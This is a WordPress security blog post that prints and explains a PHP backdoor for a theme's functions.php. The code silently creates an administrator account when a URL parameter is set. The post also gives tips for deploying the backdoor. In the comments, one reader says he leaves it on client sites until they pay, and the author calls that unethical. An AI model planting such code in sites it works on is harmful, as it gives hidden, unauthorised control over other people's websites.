Celebrating the 100th customer - 60% OFF the Password Policy Manager for WordPress plugin. GET DISCOUNT NOW

WordPress Backdoor to Create Administrator Account

Last updated on April 12th, 2019 by Robert Abela. Filed under WordPress Security Tutorials & Tips

While doing a WordPress security audit and WordPress security lock down for one of our customers, I noticed he had a WordPress password backdoor installed on his WordPress installation. The WordPress backdoor is a very simple, yet powerful PHP script which can be triggered by accessing a specific URL using a normal web browser, such as Google Chrome of Firefox.

Once the WordPress backdoor is triggered, a new WordPress user with Administrator role is automatically created on the customer’s WordPress website, which a malicious user can use to regain access to someone’s WordPress installation any time he or she wants. In this post we will have a look at this WordPress backdoor’s code and explain how it works.

Note: This post is for educational and learning purposes ONLY. In fact we DO NOT recommend anyone to use such a backdoor in his or her WordPress installation.

WordPress Backdoor

The WordPress backdoor is listed in the below example. It is a simple PHP function that can be added to the WordPress theme’s functions.php file.

<?php
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

The backdoor can be triggered by accessing the URL https://www.wpwhitesecurity.com?backdoor=go (if installed on www.WP White Security.com (this is a NON working example)).

How Does the WordPress Password Backdoor Work?

Using the above example, once the WordPress backdoor is triggered a new WordPress administrator account is created with the following credentails:

User:  backdooradmin
Password: Pa55W0rd

Using the WordPress Backdoor

If you would like to use the above WordPress backdoor for whatever reason you might have, use a different URL (by changing the GET variable and value on line 5) from the one specified in the above exampled. Also use a strong username and password (specified on line 8).

WP White Security Tip: We DO NOT recommend you to use such WordPress backdoor. This information in this post should only be used for educational and learning purposes.

Please note that by posting information about this WordPress backdoor online, we are not exposing anything malicious. For someone to create such backdoor, he or she would need FTP access to your WordPress website. If someone manages to gain FTP access to your WordPress website, there are many other things you should worry about rather than this WordPress backdoor.

If you would like to make a WordPress Security Audit, pimp up the security of your WordPress installation or need any type of WordPress professional support, drop us an email on help@wpwhitesecurity.com.

WordPress Hosting, Firewall and Backup

This Website is:

6 comments

Tico 14/12/2012

Hi, the script works as you explain but I keep getting this error “You do not have sufficient permissions to access this page.” Even after I log out and then use the normal admin access, I can see the new account made along with the user role being admin but I still get the error. I am using 3.4.2 Please help

John Bonello 14/12/2012

Hi Tico,

Thank you for following our blog. We are willing to assist you solve your issue, but due to the sensitivity of the issue (i.e. a WordPress backdoor implementation) contact us directly via our contact form since we need to verify that you are the owner of the website you are working on.

Joni 24/09/2018

Guys, I need to erase an entire post along with its corresponding photos in my blog. But whenever I sign in and look at my dashboard, the post isn’t there. Impossible to delete something that doesn’t exists, right? But when I web search or view the blog site, the post and photos are there. What’s happening here? No, I did not use that reality stone on my blog.

Here’s my WordPress blog — jonianzures.wordpress.com and I want to completely remove the post “Janet and Niña at SM City – Marilao” and its pictures. Many thanks, amigos!

You can delete it from there or just me how to dowg it.

Robert Abela 03/10/2018

Thanks for reaching out Joni. We do not provide such services but may I recommend you to read how to clean a hacked WordPress website?

Note that the article is introductory and if you do not have experience with these things, you’d be better off paying someone professional to check the website for you.

Pat Racco 07/05/2019

It worked perfectly, thanks a lot!
I’ve been ripped off once so I believe leaving a backdoor until the client pays you in full is more than legit.
I would just suggest specifying that the abovementioned credentials should be changed every time, otherwise anyone could run a simple script and find backdoors like the above.
Just my 2 cents.
Regards,
Pat

Robert Abela 07/05/2019

Glad it worked for you. However, I do not recommend to use this as a backdoor on your clients website. Such approach is really unethical and very risky! There are several other ways how to protect your benefits / business without using such measures.

Leave a Reply

Your email address will not be published. Required fields are marked *